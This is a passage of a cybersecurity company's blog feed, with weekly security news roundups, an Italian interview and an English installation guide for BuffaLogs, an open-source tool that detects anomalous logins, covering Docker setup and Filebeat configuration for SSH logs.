&lt;h2&gt;BCE will conduct stress tests on european banks&lt;/h2&gt;
&lt;h3&gt;#Finance and Cybersecurity&lt;/h3&gt;
&lt;p&gt;BCE is preparing the first stress test for European banks to asset the &lt;strong&gt;Incident Response&lt;/strong&gt; procedures in case of serious attacks.&lt;/p&gt;
&lt;p&gt;&quot;Cyber risk insights: European banks IT complexity amplifies risk&quot;  analysis conducted by &lt;strong&gt;S&amp;#x26;P Global Ratings&lt;/strong&gt;, highlights how &lt;strong&gt;European banks are increasingly exposed to cyber risks&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.cybersecitalia.it/attacchi-informatici-andrea-enria-bce-nel-2024-effettueremo-stress-test-per-le-banche-vigilate/27135/&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - November 3rd]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-november-3/</link><guid isPermaLink="false">weekly-highlights-november-3</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 02 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;FIRST announced CVSS v4.0&lt;/h2&gt;
&lt;h3&gt;#Threat Detection&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;FIRST&lt;/strong&gt;, the global Forum of Incident Response and Security Teams, which includes more than 650 organizations, including Certego,  from more than 100 countries, has officially announced &lt;strong&gt;CVSS v4.0&lt;/strong&gt;, the next generation of the Common Vulnerability Scoring System standard &lt;strong&gt;to provide the highest fidelity of vulnerabilities&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.first.org/cvss/v4-0/&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Standard &amp;#x26; Poor&apos;s cybersecurity global report&lt;/h2&gt;
&lt;h3&gt;#Research&lt;/h3&gt;
&lt;p&gt;The Standard &amp;#x26; Poor&apos;s Global report titled &quot;Enhanced Corporate Cybersecurity Measures in Response to the Growing Prevalence of Cyber Attacks&quot; highlights how the &lt;strong&gt;financial impact of cybercrime is steadily increasing for businesses&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Download the report: &lt;a href=&quot;https://www.spglobal.com/ratings/en/research/articles/231025-corporates-up-their-cyber-preparedness-as-cyber-attacks-become-more-widespread-12886049&quot;&gt;click to download&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Israeli entities under attack by MuddyWater’s spear-phishing advanced tactics&lt;/h2&gt;
&lt;h3&gt;#Cyberwar&lt;/h3&gt;
&lt;p&gt;The Iranian cybercriminal group MuddyWater has launched a new spear-phishing campaign against two Israeli entities, utilizing advanced remote administration tools.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2023/11/irans-muddywater-targets-israel-in-new.html?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Boeing says cyber incident hit parts business after ransom threat&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;Boeing, the aerospace industry leader, has acknowledged a cyber incident just days after ransomware gang &lt;strong&gt;LockBit&lt;/strong&gt; reportedly &lt;strong&gt;exfiltrated&lt;/strong&gt; sensitive data from the aerospace defense contractor. &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.theregister.com/2023/11/02/boeing_cyber_incident/?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Migliorare il rilevamento dei login anomali con l'applicazione di Authentication Protection di Certego]]></title><description><![CDATA[Intervista a Lorena Goldoni - Threat Detection Engineer di Certego!]]></description><link>https://www.certego.net/blog/buffalog-migliorare-il-rilevamento-dei-login-anomali/</link><guid isPermaLink="false">buffalog-migliorare-il-rilevamento-dei-login-anomali</guid><category><![CDATA[Blog]]></category><pubDate>Sun, 29 Oct 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Cos’è BuffaLogs?&lt;/h2&gt;
&lt;p&gt;BuffaLogs è un &lt;strong&gt;sistema di rilevamento dei login anomali&lt;/strong&gt;. Il suo obiettivo è segnalare se viene effettuata una autenticazione da un nuovo dispositivo, da un nuovo paese e notificare i cosiddetti &quot;&lt;strong&gt;Impossible Travel&lt;/strong&gt;&quot;, ovvero i login che vengono effettuati in un range di tempo e da una distanza geografica non giustificabili dai convenzionali mezzi di trasporto. (ad esempio, un login dello stesso utente prima in Italia e poi in Cina nel giro di pochi minuti e ore).&lt;/p&gt;
&lt;p&gt;BuffaLogs è stato sia rilasciato come software &lt;strong&gt;Open Source&lt;/strong&gt;, sia &lt;strong&gt;integrato con successo all’interno della piattaforma MDR Certego PanOptikon®&lt;/strong&gt;, per estendere la capacità di individuare gli accessi potenzialmente pericolosi sulle infrastrutture dei clienti Certego e migliorare le capacità di analisi del team di Detection and Response.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Come funziona?&lt;/h2&gt;
&lt;p&gt;Mediante l&apos;applicazione di logiche di rilevamento specifiche, il sistema &lt;strong&gt;esamina ogni singolo accesso registrato su diverse sorgenti, quali firewall, applicazioni web o ambienti cloud&lt;/strong&gt;. Lo scopo è individuare autenticazioni anomale e generare immediatamente notifiche di allarme.&lt;/p&gt;
&lt;p&gt;Per rendere l&apos;applicativo personalizzabile in base alle specifiche esigenze di ogni azienda, BuffaLogs consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Definire un livello di rischio personalizzato per ciascun utente&lt;/strong&gt;;&lt;/li&gt;
&lt;li&gt;Applicare appositi filtri per &lt;strong&gt;escludere specifici accessi dalle attività di rilevamento&lt;/strong&gt;, sia relativi ai Paesi da cui provengono o da specifici indirizzi IP.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Infine, possono anche essere notificati degli &quot;&lt;strong&gt;utenti vip&lt;/strong&gt;&quot;, con alti privilegi nel sistema, per i quali si desidera dedicare una particolare attenzione.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Qual è la caratteristica che lo rende innovativo?&lt;/h2&gt;
&lt;p&gt;Sul mercato sono presenti diverse soluzioni di rilevamento dei login anomali, ma essendo applicativi proprietari, anche se acquistati, forniscono alle organizzazioni o ai team di rilevamento solo alert di tipo generico, senza informazioni di contesto e pochi dettagli.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A differenza delle soluzioni proprietarie&lt;/strong&gt;, BuffaLogs si distingue come un&apos;applicazione Open Source con codice sorgente pubblico. Questa particolare caratteristica, unita al fatto che l&apos;applicazione è stata sviluppata internamente da Certego, &lt;strong&gt;ci permette di analizzare in modo dettagliato le ragioni per cui un allarme è stato attivato, consultare i dati grezzi circostanti e aggiornare il codice per rispondere alle nuove esigenze emergenti&lt;/strong&gt;.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Come è nata l’idea?&lt;/h2&gt;
&lt;p&gt;L&apos;idea è emersa dalla consapevolezza che il &lt;strong&gt;90% delle compromissioni che rileviamo in ambienti cloud proviene da accessi legittimi effettuati con credenziali rubate&lt;/strong&gt;. Sulla base di questa necessità, abbiamo deciso di sviluppare un applicativo per rafforzare ulteriormente il monitoraggio degli accessi.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;BuffaLogs nasce da un progetto di tesi, raccontaci la tua esperienza&lt;/h2&gt;
&lt;p&gt;Durante il mio tirocinio di laurea triennale, ho avuto l&apos;opportunità di svolgere un&apos;esperienza formativa presso Certego. Ero entusiasta all&apos;idea di entrare in un&apos;azienda di punta nel settore della cybersecurity, in linea con la mia formazione, e allo stesso tempo in una realtà giovane e in rapida espansione, che dimostrava un reale interesse per le nuove risorse.&lt;/p&gt;
&lt;p&gt;Sono stata assegnata al team di Threat Detection, dove mi sono immediatamente integrata sia a livello professionale che personale.
Inizialmente mi era stato proposto un progetto meno implementativo, considerato il breve periodo di tempo messo a disposizione dal tirocinio universitario. Tuttavia, &lt;strong&gt;la mia richiesta di sviluppare un&apos;applicazione completamente nuova è stata accolta con entusiasmo&lt;/strong&gt;. Sembrava una vera corsa contro il tempo, ma ha altresì confermato la fiducia e il dinamismo che Certego dimostra nell&apos;&lt;strong&gt;affrontare nuove sfide e accogliere proposte innovative quotidianamente&lt;/strong&gt;.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Università, innovazione e giovani professionisti. È importante trovare un’azienda che creda nei giovani?&lt;/h2&gt;
&lt;p&gt;In un settore dinamico come la cybersecurity, caratterizzato da rapidi cambiamenti e l&apos;incessante avanzamento delle tecnologie, ritengo sia cruciale &lt;strong&gt;sapersi adattare a questa trasformazione continua&lt;/strong&gt;. Questo adattamento beneficia enormemente del contributo di menti giovani, che, anche se meno esperte, portano con sé una fresca prospettiva e la voglia di innovare.&lt;/p&gt;
&lt;p&gt;La caratteristica distintiva che ho riscontrato in Certego è stata la reale fiducia e l&apos;attenzione prestata, anche alle domande e alle prospettive meno esperte. Questo atteggiamento richiede che persino i professionisti più esperti siano disposti a mettere in discussione le loro idee; ed è proprio questo elemento che contraddistingue Certego.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Essere una giovane donna in un settore a prevalenza maschile, cosa significa? Le cose stanno cambiando?&lt;/h2&gt;
&lt;p&gt;Nel contesto più ampio dell&apos;industria, è evidente che stiano avvenendo dei cambiamenti significativi. Tuttavia, non possiamo ignorare il fatto che, a parità di competenze, le donne affrontino ancora sfide più impegnative e debbano spesso combattere pregiudizi riguardo alle loro capacità professionali, specialmente quando si tratta di compiti come l&apos;installazione di cavi o la scrittura di centinaia di righe di codice (afferma sorridendo).&lt;/p&gt;
&lt;p&gt;Fortunatamente, Certego si distingue anche in questo aspetto; &lt;strong&gt;riconosce il valore di avere un team eterogeneo&lt;/strong&gt;, dove si presta attenzione a diverse fasi del processo e si promuove un&apos;analisi da prospettive diverse. Ciò consente di ottenere una visione completa e arricchita del contesto.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Quale consiglio daresti a ragazze e ragazzi che voglio intraprendere un percorso simile al tuo?&lt;/h2&gt;
&lt;p&gt;Siate curiosi. La curiosità è il motore dell&apos;apprendimento, dell’impegno e della determinazione. Persino la passione nasce da un primo momento in cui si è stati semplicemente curiosi.
Quindi... Non soffermatevi su l&apos;insostenibile leggerezza dell&apos;ETERE.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scopri di più BuffaLogs: &lt;a href=&quot;https://www.certego.net/blog/buffalogs-anomaly-detection-in-login-data/&quot;&gt;Vai all&apos;approfondimento tecnico&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - October 27th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-october-27/</link><guid isPermaLink="false">weekly-highlights-october-27</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 26 Oct 2023 22:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Okta says hackers breached its support system and accessed customer files&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Hackers gained access to Okta&apos;s customer support management system&lt;/strong&gt;, allowing them to view private customer information, including sensitive data such as cookies and session tokens.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/okta-says-its-support-system-was-breached-using-stolen-credentials/&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Citrix urges NetScaler ADC, Gateway customers to patch&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Citrix is urging its customers to upgrade to the latest versions of NetScaler ADC and NetScaler Gateway due to reports of targeted attacks and session hijacking.
&lt;strong&gt;The company released patches to address a critical vulnerability, CVE-2023-4966&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.cybersecuritydive.com/news/citrix-netscaler-adc-gateway-patch/697615/?&amp;#x26;web_view=true&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ENISA Threat landscape report 2023&lt;/h2&gt;
&lt;h3&gt;#Research&lt;/h3&gt;
&lt;p&gt;ENISA has published the Threat Landscape (ETL) report, an &lt;strong&gt;annual report on the status of the cybersecurity threat landscape&lt;/strong&gt;. It identifies the top threats, major trends observed with respect to threats, threat actors and attack techniques, as well as impact and motivation analysis.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Download the report: &lt;a href=&quot;https://www.enisa.europa.eu/publications/enisa-threat-landscape-2023&quot;&gt;click to download&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[State of cybersecurity]]></title><description><![CDATA[Il report che racconta lo stato di sicurezza delle aziende italiane]]></description><link>https://www.certego.net/blog/state-of-cybersecurity-one/</link><guid isPermaLink="false">state-of-cybersecurity-one</guid><category><![CDATA[Blog]]></category><pubDate>Mon, 09 Oct 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;State of Cybersecurity è la ricerca realizzata da Certego per AUSED, l’Associazione tra Utenti di Sistemi e Tecnologie dell’informazione che raccoglie oltre duecento aziende. L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon, è confrontare i volumi di attacco del primo semestre del 2023, con quelli dello stesso periodo dell’anno precedente.&lt;/p&gt;
&lt;p&gt;Solo nel 2023 sono aumentati del 42% gli attacchi informatici capaci di superare le prime linee di difesa, intaccando così la sicurezza delle organizzazioni.&lt;/p&gt;
&lt;p&gt;Un trend che conferma la necessità, da parte delle imprese, di sviluppare strategie e adottare soluzioni in grado di rilevare attacchi informatici di ultima generazione, ma anche di destinare budget maggiori alla cybersecurity, che oggi rappresenta una delle principali fonti di rischio per il business aziendale.&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi?
Quali sono le superfici di attacco più a rischio?
Quali sono i settori maggiormente esposti?
Qual è il rapporto tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Sono alcune delle domande a cui rispondiamo all’interno del report.&lt;/p&gt;
&lt;p&gt;Consulta il report completo:
&lt;a href=&quot;/website/38a26c80c97d5d9dcf352c3b0c5d5823/state-of-cybersecurity-h1-h2-2023.pdf&quot;&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1200px; &quot;
    &gt;
      &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 52.34375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAIDBf/EABUBAQEAAAAAAAAAAAAAAAAAAAAD/9oADAMBAAIQAxAAAAHlUxopA//EABgQAAMBAQAAAAAAAAAAAAAAAAABERAy/9oACAEBAAEFAkSFHxn/xAAXEQEAAwAAAAAAAAAAAAAAAAAAAQIS/9oACAEDAQE/AYs0/8QAFREBAQAAAAAAAAAAAAAAAAAAABH/2gAIAQIBAT8BR//EABQQAQAAAAAAAAAAAAAAAAAAACD/2gAIAQEABj8CX//EABsQAAIBBQAAAAAAAAAAAAAAAAABERAhMWGB/9oACAEBAAE/IUUaJXIYx8r/AP/aAAwDAQACAAMAAAAQkx//xAAWEQEBAQAAAAAAAAAAAAAAAAAAEWH/2gAIAQMBAT8QxW//xAAVEQEBAAAAAAAAAAAAAAAAAAAAEf/aAAgBAgEBPxCIf//EABwQAQACAwADAAAAAAAAAAAAAAEAESExYUFxkf/aAAgBAQABPxBgCsOb83CzYewirlMcIvjDHc//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Consulta il report completo:&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b17bd37606ac0b643e45cdec0d800118/e5166/State-of-cybersecurity.jpg&quot;
        srcset=&quot;/website/static/b17bd37606ac0b643e45cdec0d800118/4ecad/State-of-cybersecurity.jpg 384w,
/website/static/b17bd37606ac0b643e45cdec0d800118/212bf/State-of-cybersecurity.jpg 768w,
/website/static/b17bd37606ac0b643e45cdec0d800118/e5166/State-of-cybersecurity.jpg 1200w&quot;
        sizes=&quot;(max-width: 1200px) 100vw, 1200px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
    &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[BuffaLogs: Anomaly detection in login data]]></title><description><![CDATA[An Open Source solution for the authentication protection of your organization]]></description><link>https://www.certego.net/blog/buffalogs-anomaly-detection-in-login-data/</link><guid isPermaLink="false">buffalogs-anomaly-detection-in-login-data</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Threat Detection]]></category><category><![CDATA[Open Source]]></category><dc:creator><![CDATA[Lorena Goldoni, Threat Detection Engineer]]></dc:creator><pubDate>Wed, 27 Sep 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1-why-should-you-monitor-the-logins-of-your-company-right-now&quot;&gt;Why should you monitor the logins of your company, right now?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-how-can-buffalogs-protect-you&quot;&gt;How can BuffaLogs protect you?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-how-to-install-and-configure-buffalogs&quot;&gt;How to install and configure BuffaLogs&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#monitor-ssh-logins&quot;&gt;Monitor ssh logins&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-would-you-like-to-collaborate-with-us&quot;&gt;Would you like to collaborate with us?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5-full-featured-log-in-analysis-in-panoptikon&quot;&gt;Full featured log-in analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;1. Why should you monitor the logins of your company, right now?&lt;/h2&gt;
&lt;p&gt;In the last few years, the security related to credential-based authentication systems has considerably been improving, implementing password strength meter and multi-factor authentication. Despite this, credential thefts, the first stage of a credential-based attack, have been increasing, too. In order to gain the victims’ credentials, the attackers can conduct a non-targeted phishing, such as in mass credential harvesting campaigns, or spear-phishing, carefully researching their targets, so as to disguise themselves as trusted senders in a reasonable context.
Since &lt;strong&gt;credential stealing attacks are mainly based on human errors, these cyber intrusions are not always predictable by hunting systems&lt;/strong&gt;. For these reasons, the purpose of this project is to provide an Open Source solution for the detection of anomalous logins.&lt;/p&gt;
&lt;h2&gt;2. How can BuffaLogs protect you?&lt;/h2&gt;
&lt;p&gt;BuffaLogs detects anomalies on login data: it is an early-warning system that notifies the user, so a login compromission can be seen and stopped before the attacker can do malicious activities.&lt;/p&gt;
&lt;p&gt;In particular, the system sends three types of alert:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Impossible Travel&lt;/strong&gt;: it occurs when a user logs into the system from a significant distance within a range of time that cannot be covered by conventional means of transport.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Login from new device&lt;/strong&gt;: this alert is sent if the user utilizes an appliance for the first time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Login from a new country&lt;/strong&gt;: this alarm is dispatched if the system is logged by a user from a country where they have never authenticated before.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;According to the triggered alerts, a risk level (no risk, low, medium or high) is assigned to each user of the company, in order to immediately have an overview about the accounts most at risk.&lt;/p&gt;
&lt;p&gt;In addition, it is possible to configure some properties concerning the detection to be more accurate:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a list of the &lt;strong&gt;allowed countries&lt;/strong&gt;, containing the states the users visit the most;&lt;/li&gt;
&lt;li&gt;a list with the &lt;strong&gt;vip users&lt;/strong&gt; of the company, so all the accounts with privilged positions;&lt;/li&gt;
&lt;li&gt;the &lt;strong&gt;ignored ips&lt;/strong&gt;, including all those networks or single IPs to ignore;&lt;/li&gt;
&lt;li&gt;the &lt;strong&gt;ignored users&lt;/strong&gt; in which the users to discard are stored.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2c6792780be62f0460d31467519ab101/a878e/buffalogs_dashboard_homepage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 58.59375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAAByklEQVR42n1S227aQBRc8D1rMOv7BRxjbIzt9RVQXyjKQ5U2EopaVWorpeUhn5Kf6W/2LEgJVVGlefD6zOzsOXNQGFfztJFVRxm5surysslJ+n/Ay8ZQJEC+f/iCDCd2gqWMHfHGAgxFHXBVJiisivgJgJOMIMyRhG3NvJ1YEXxAGZ4AV3CycSkDK6imeePNFk4QW15k+9GY+EjEzudPh67sdHe+v7v/9XQ8PDwSzUUC4S/EsmrX/Zq2XdX1K1qvaLXIKAKTjvaEBDndfv32dNjt+3ojK8bwH2farsumW1VNWtBklc/TAiFurNvR+7uPWPN2+w+8SCwvnkb5qbEr4qJqlkWV5AUTg4OELTdIgaRqPhwnZmi58UD4W6xeFbPxEsCZNADw2vCkhFT40+QuxfmlGNzUSTAQgcpMRmQ61mfMUCTQEeK012dX3Ya2fV63b2IBO7o+tbCBmLkB6QPvbBUvytso5xXzfKz7Le2YeUbrtCjZtCGPlzb5vSs620M8wSNHumFsw46Ox+fvP35C8tA/RNVv37Wbbb3eFHWb0SorG4QVs7Zc3wgcFjrrU1BMtm3Ydqep7SewsDAX+BPG2Wy+BPhh4oewl4s/EpJEXuww8GwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;BuffalogsDashboardHomepage&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2c6792780be62f0460d31467519ab101/71c1d/buffalogs_dashboard_homepage.png&quot;
        srcset=&quot;/website/static/2c6792780be62f0460d31467519ab101/804b2/buffalogs_dashboard_homepage.png 384w,
/website/static/2c6792780be62f0460d31467519ab101/e5715/buffalogs_dashboard_homepage.png 768w,
/website/static/2c6792780be62f0460d31467519ab101/71c1d/buffalogs_dashboard_homepage.png 1536w,
/website/static/2c6792780be62f0460d31467519ab101/a878e/buffalogs_dashboard_homepage.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;3. How to install and configure BuffaLogs&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;BuffaLogs is a Docker containerized application, so it runs in isolated runtime environments that encapsulate all its dependencies, libraries and configuration file. For this reason, no software download or installation is required except for &lt;a href=&quot;https://docs.docker.com/get-docker/&quot;&gt;Docker&lt;/a&gt; and the &lt;a href=&quot;https://docs.docker.com/compose/install/linux/&quot;&gt;Compose plugin&lt;/a&gt;. For example with the &lt;strong&gt;sudo apt-get install docker.io docker-compose&lt;/strong&gt; on Ubuntu.&lt;/p&gt;
&lt;p&gt;Once installed, you can download the application directly from the &lt;a href=&quot;https://hub.docker.com/r/certego/buffalogs&quot;&gt;Docker Hub&lt;/a&gt;, with the &lt;strong&gt;sudo docker pull certego/buffalogs:&amp;#x3C;release_tag&gt;&lt;/strong&gt; command.&lt;/p&gt;
&lt;p&gt;After that, there are two ways of running BuffaLogs, depending on your system configurations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;if you already have an elastic cluster:
&lt;ul&gt;
&lt;li&gt;set the address of the host into the &lt;strong&gt;CERTEGO_ELASTICSEARCH&lt;/strong&gt; variable in the &lt;strong&gt;buffalogs.env&lt;/strong&gt; file&lt;/li&gt;
&lt;li&gt;launch &lt;strong&gt;docker-compose up -d&lt;/strong&gt; to run the containers&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;if you have no hosts with Elasticsearch installed on it, you can run it directly with BuffaLogs:
&lt;ul&gt;
&lt;li&gt;run &lt;strong&gt;docker-compose -f docker-compose.yml -f docker-compose.elastic.yml up -d&lt;/strong&gt; in order to execute all the containers, included Elasticsearch and Kibana&lt;/li&gt;
&lt;li&gt;Now elasticsearch and kibana are running on the same host with BuffaLogs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;For now on the IP of the host were BuffaLogs is running will be referenced as BUFFALOGS_IP.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Now, you can start the detection of any type of logs, as long as they are compliant with the &lt;a href=&quot;https://www.elastic.co/guide/en/ecs/current/ecs-field-reference.html&quot;&gt;ECS - Elastic Common Schema&lt;/a&gt;. In particular, the fields used by BuffaLogs are:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
    &quot;_index&quot;: &quot;&amp;lt;elastic_index&gt;&quot;,
    &quot;_id&quot;: &quot;&amp;lt;log_id&gt;&quot;,
    &quot;@timestamp&quot;: &quot;&amp;lt;log_timestamp&gt;&quot;,
    &quot;user&quot;: {
        &quot;name&quot;: &quot;&amp;lt;user_name&gt;&quot;
    },
    &quot;source&quot;: {
        &quot;geo&quot;: {
            &quot;country_name&quot;: &quot;&amp;lt;country_origin_log&gt;&quot;,
            &quot;location&quot;: {
                &quot;lat&quot;: &quot;&amp;lt;log_latitude&gt;&quot;,
                &quot;lon&quot;: &quot;&amp;lt;log_longitude&gt;&quot;
            }
        },
        &quot;ip&quot;: &quot;&amp;lt;log_source_ip&gt;&quot;
    },
    &quot;user_agent&quot;: {
        &quot;original&quot;: &quot;&amp;lt;log_device_user_agent&gt;&quot;
    },
    &quot;event&quot;: {
        &quot;type&quot;: &quot;start&quot;,
        &quot;category&quot;: &quot;authentication&quot;,
        &quot;outcome&quot;: &quot;success&quot;
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Below you can find an example that helps you to configure the system for monitoring ssh logins.&lt;/p&gt;
&lt;h3&gt;Monitor ssh logins&lt;/h3&gt;
&lt;p&gt;For monitoring ssh logins, first of all &lt;a href=&quot;https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html&quot;&gt;install Filebeat&lt;/a&gt; on every host you want to collect logs; secondly, for inspecting the syslog and authorization logs, it is necessary to set the path in the &lt;strong&gt;/etc/filebeat/modules.d/system.yml&lt;/strong&gt; file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;- module: system
  syslog:
    enabled: true
    var.paths: [&quot;/var/log/syslog*&quot;]
  auth:
    enabled: true
    var.paths: [&quot;/var/log/auth.log*&quot;]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In order to send these events directly to Elasticsearch, set the authentication credentials in the &lt;strong&gt;/etc/filebeat/filebeat.yml&lt;/strong&gt; file:&lt;/p&gt;
